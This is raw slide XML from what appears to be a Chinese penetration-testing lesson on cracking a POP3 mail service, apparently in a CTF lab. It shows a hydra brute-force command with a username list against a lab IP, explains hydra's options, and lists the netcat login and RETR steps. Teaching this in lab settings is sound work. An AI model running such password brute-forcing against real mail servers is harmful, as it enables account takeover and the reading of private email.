          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2326462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破解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>pop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>服务</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Oval 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40C9A73B-49D7-45A8-88C7-9F1FAEF64B8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5546835" y="2198166"/>
            <a:ext cx="709855" cy="709855"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx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华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="id-ID" sz="2800" dirty="0">
              <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Oval 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A55C727-9E4A-42E3-BC20-37A2716236B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5546835" y="3342203"/>
            <a:ext cx="709855" cy="709855"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2D5AC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华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="id-ID" sz="2800" dirty="0">
              <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Oval 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF1A10EA-876A-4A6D-A5BE-70253CC811DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5546835" y="4490806"/>
            <a:ext cx="709855" cy="709855"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="959DBF"/>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华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr lang="id-ID" sz="2800" dirty="0">
              <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="文本框 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C81A055-6AE1-4565-9710-CD12257D071D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6499062" y="2156364"/>
            <a:ext cx="5218167" cy="600870"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"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暴力破解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1"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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"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工具：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1"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hydra</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="文本框 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B69ED931-B12F-44E0-9813-C21E1D5C28B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6499063" y="3299188"/>
            <a:ext cx="5218166" cy="600870"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"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登录邮箱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1"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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"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工具：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1"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netcat</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2C07BF1-D091-46D7-A8E2-23B2CB0B5958}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6499062" y="4442012"/>
            <a:ext cx="5218167" cy="600870"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>查看邮件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>指令：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>retr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="17" name="图示 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFF143E2-9E9D-4E74-A867-C1670B524957}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3802091364"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="383334" y="1379224"/>
          <a:ext cx="4307354" cy="42241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257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破解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>pop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>服务</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Oval 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4606902-241B-41C8-8144-DDF4946771A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="424290" y="978733"/>
            <a:ext cx="709855" cy="709855"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2D5AC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id-ID" sz="2800" b="1" dirty="0">
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="文本框 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B69D17D7-B623-47CF-8F08-DDCA37BE98EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323409" y="997879"/>
            <a:ext cx="5218166" cy="673454"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>暴力破解</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="文本框 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71F6F9D2-8A5E-4749-9CD1-706E5EB993EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="438150" y="1861820"/>
            <a:ext cx="6732905" cy="1246505"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"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echo -e 'natalya\nboris'&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"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text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"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.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"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hydra -L text.txt -P /usr/share/wordlists/fasttrack.txt 192.168.194.146 -s 55007 pop3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="图片 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5F0B867-AF3B-40D7-B283-4EA82E04328C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId12"/>
          <a:srcRect l="-2" t="126" r="61607" b="69405"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="382400" y="3360973"/>
            <a:ext cx="5226165" cy="1759995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="直接连接符 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12666A8E-6501-4A79-A643-8DF1658BC013}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7474585" y="969645"/>
            <a:ext cx="0" cy="5466715"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="285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85527772-6CC3-441E-886E-97CE7F666826}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7889240" y="1419860"/>
            <a:ext cx="3964305" cy="4663440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">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华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="矩形 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E651A3C-23DB-4F4A-8280-646F02D87BBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7889240" y="1419860"/>
            <a:ext cx="3964305" cy="1118870"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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hydra</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="24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开源暴力破解工具</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="右箭头 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E92CBC66-80AC-4A00-BAF4-49D81C657B1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8136890" y="2608580"/>
            <a:ext cx="189865" cy="249555"/>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2500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="右箭头 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8572E9BC-9894-4B0C-BAA3-3AE7F0A26280}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8120380" y="3539490"/>
            <a:ext cx="208280" cy="256540"/>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2500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="矩形 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9A8C7BD-9C87-4B41-911F-B857B362BABF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8341995" y="2519045"/>
            <a:ext cx="3093720" cy="1020445"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>支持大部分协议的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>在线</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>密码破解，渗透测试必备工具。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="矩形 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44C18EF2-E1E9-4F0D-B70E-7316C00FF468}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8341995" y="3394710"/>
            <a:ext cx="3093720" cy="2455545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>常见参数：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>-L	指定用户名字典</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>-P	指定密码字典</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>server	目标ip</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>-s	可指定非默认端口</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
